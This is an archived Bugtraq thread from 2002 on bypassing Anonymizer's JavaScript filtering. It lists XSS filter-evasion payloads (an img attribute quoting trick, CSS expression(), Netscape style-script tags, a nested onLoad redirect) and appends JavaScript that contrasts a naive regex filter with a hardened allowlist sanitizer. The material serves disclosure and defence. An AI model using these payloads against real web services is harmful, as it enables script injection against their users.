Bugtraq mailing list archives
Re: Bypassing javascript filters - problem N3.
From: fozzy () dmpfrance com
Date: Tue, 02 Apr 2002 15:48:23 GMT
Hello,

I took a quick look at it. This service seems to be vulnerable to several known attacks against webmails. I successfully injected unfiltered javascript into a web page browsed through Anonymizer using:

* <img aaa="bbb>" src="javascript:alert('beep');">
  (the original idea was published by Mark Slemko on vuln-dev, 23 Feb 2000... but is still ignored on many webmails!)

* <P STYLE="left:expression(eval('alert(\'boop\')'))">
  (thx to Guninski - Bugtraq 1999)

* Some things that seem to work only with Netscape 4.x, like:
  <STYLE TYPE="text/javascript">alert('biip');</style>
  <STYLE TYPE="application/x-javascript">alert('burp');</style>
  <LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://.../script.js">
  (thx to Jeremiah Grossman - WhiteHatSec Aug 2001)

...and probably more!...

I wish good luck to Anonymizer, because what they are trying to do is very close to "malicious html filtering" in webmails, and it seems to be really difficult for webmail sites to set up good filters. I hope Anonymizer will show the way to a good web privacy.

FozZy
Hackademy - Paris.
Hackerz Voice International Edition
http://www.dmpfrance.com

Alexander K. Yezhov wrote:
Hello bugtraq,

Title: Bypassing JavaScript filters
Service: Anonymizer, maybe similar services

Description: Anonymizer offers free and commercial services that allow you to browse the web safely. Since JavaScript can be dangerous, all script blocks and events are cut from the HTML.

Problem N3: Maybe you remember the problem I reported in 2001 - JavaScript code could be executed after the parsing of the HTML by Anonymizer. The same principle of "JavaScript inside JavaScript" recently gave me a working example of redirecting Anonymizer users.

Demo is available as Test N3 at http://anon.free.anonymizer.com/http://tools-on.net/you.shtml

The part of the code before parsing:
  onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970 onLoad="location='unprotected_location';"

The same code after parsing:
  onLoad="location='unprotected_location';"

Errors generated for visitors without Anonymizer are suppressed by a window.onError handler.

Problem status: Anonymizer has been contacted and patched already.

Best regards,
Alexander
-----------------------------------------------------------------------
MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000
http://leader.ru
http://tools-on.net (Security & Privacy on the Net)
-----------------------------------------------------------------------
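Both posts above describe the same failure class: a filter that patches HTML text with regexes, so that either a quoted ">" ends the filter's idea of a tag too early (fozzy's img trick) or the residue left after one stripping pass recombines into a live event handler (Alexander's "JavaScript inside JavaScript"). The following is an added example, not code from either post and not Anonymizer's filter: naiveFilter is an assumed approximation of such a regex filter, hardenedFilter, splitTags, parseTag, ALLOWED and safeUrl are names chosen here, and the payloads are constructed for this example (the nested-handler one has the same shape as Alexander's but is not his exact string).

```javascript
// Added example, not code from the Bugtraq thread or from Anonymizer: a naive
// regex "JavaScript filter" of the kind both posts attack, beside a quote-aware
// allowlisting rewrite, run over payloads of the same shapes as those discussed.
// The naive filter is an assumed approximation; the nested-handler payload is
// constructed here and is not the one in Alexander's post.

// Naive filter: one global regex pass per problem.
function naiveFilter(html) {
  let out = html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
  // Strip on*="..." handlers in a single left-to-right pass.
  out = out.replace(/\son\w+\s*=\s*"[^"]*"/gi, "");
  // Strip javascript: URLs, but only inside what <[^>]*> takes to be a tag,
  // so a quoted '>' in an earlier attribute ends the "tag" too early.
  out = out.replace(/<[^>]*>/g, tag =>
    tag.replace(/\s(?:src|href)\s*=\s*"javascript:[^"]*"/gi, ""));
  return out;
}

// Quote-aware split: a tag ends at the first '>' that is outside quotes.
function splitTags(html) {
  const parts = [];
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf("<", i);
    if (lt < 0) { parts.push({ text: html.slice(i) }); break; }
    if (lt > i) parts.push({ text: html.slice(i, lt) });
    let j = lt + 1, quote = null;
    for (; j < html.length; j++) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === ">") break;
    }
    parts.push({ tag: html.slice(lt, j + 1) });
    i = j + 1;
  }
  return parts;
}

// Attribute grammar: name, optionally = "v" | 'v' | bare.
const ATTR_RE = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function parseTag(tag) {
  const m = /^<\s*(\/?)([a-zA-Z][\w-]*)/.exec(tag);
  if (!m) return null;                       // not a tag we understand: drop it
  const rest = tag.slice(m[0].length).replace(/\/?>$/, "");
  const attrs = [];
  for (const a of rest.matchAll(ATTR_RE)) {
    attrs.push({ name: a[1].toLowerCase(), value: a[2] ?? a[3] ?? a[4] ?? "" });
  }
  return { closing: m[1] === "/", name: m[2].toLowerCase(), attrs };
}

// Allowlist: tag -> attributes that may survive. No style, no on*, no <style>/<link>.
const ALLOWED = { body: [], p: [], b: [], i: [], br: [], a: ["href"], img: ["src", "alt"] };

// URL check after removing whitespace/control bytes ("java\tscript:" tricks):
// absolute http(s)/mailto, or a relative URL with no scheme at all.
function safeUrl(v) {
  const s = v.replace(/[\s\x00-\x1f]/g, "").toLowerCase();
  return /^(https?:|mailto:)/.test(s) || !/^[a-z][a-z0-9+.\-]*:/.test(s);
}

// Hardened filter: parse, filter the model, re-serialise. Nothing of the
// original tag text is copied through, so stripped pieces cannot recombine.
function hardenedFilter(html) {
  let out = "", skipUntil = null;          // drop <script>/<style> bodies too
  for (const part of splitTags(html)) {
    if (part.text !== undefined) { if (!skipUntil) out += part.text; continue; }
    const t = parseTag(part.tag);
    if (!t) continue;
    if (skipUntil) { if (t.closing && t.name === skipUntil) skipUntil = null; continue; }
    if (t.name === "script" || t.name === "style") { if (!t.closing) skipUntil = t.name; continue; }
    const allowed = ALLOWED[t.name];
    if (!allowed) continue;                // <link>, <object>, ...: gone
    if (t.closing) { out += `</${t.name}>`; continue; }
    const kept = [];
    for (const a of t.attrs) {
      if (!allowed.includes(a.name)) continue;   // kills on*, STYLE, aaa="bbb>"
      if ((a.name === "src" || a.name === "href") && !safeUrl(a.value)) continue;
      kept.push(` ${a.name}="${a.value.replace(/&/g, "&amp;").replace(/"/g, "&quot;")}"`);
    }
    out += `<${t.name}${kept.join("")}>`;
  }
  return out;
}

// Constructed payloads of the shapes discussed in the thread.
const PAYLOADS = [
  `<img aaa="bbb>" src="javascript:alert('beep');">`,       // fozzy's img trick
  `<body onLo onLoad=""ad="alert(1)">`,                       // nested-handler residue
  `<P STYLE="left:expression(alert(1))">`,                    // CSS expression()
  `<STYLE TYPE="text/javascript">alert(1);</style>`,          // Netscape 4 style-script
];
for (const p of PAYLOADS) console.log(`naive:    ${naiveFilter(p)}\nhardened: ${hardenedFilter(p)}\n`);
```

Run with node: the naive filter returns the img payload untouched (its `<[^>]*>` tag stopped at the quoted `>` and never saw the src attribute) and turns `<body onLo onLoad=""ad="alert(1)">` into `<body onLoad="alert(1)">` because its single pass removes the inner handler and the two halves around it join up; the hardened filter emits `<img>` and `<body>`. The design point is the one both posts circle: do not patch text, parse it with the same quoting rules the browser uses, keep only an allowlist, and serialise the result from the parsed model so residue cannot form. Text nodes pass through unchanged here; a production filter would also escape them.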
Current thread:
- Bypassing javascript filters - problem N3. Alexander K. Yezhov (Apr 01)
- Re: Bypassing javascript filters - problem N3. fozzy (Apr 03)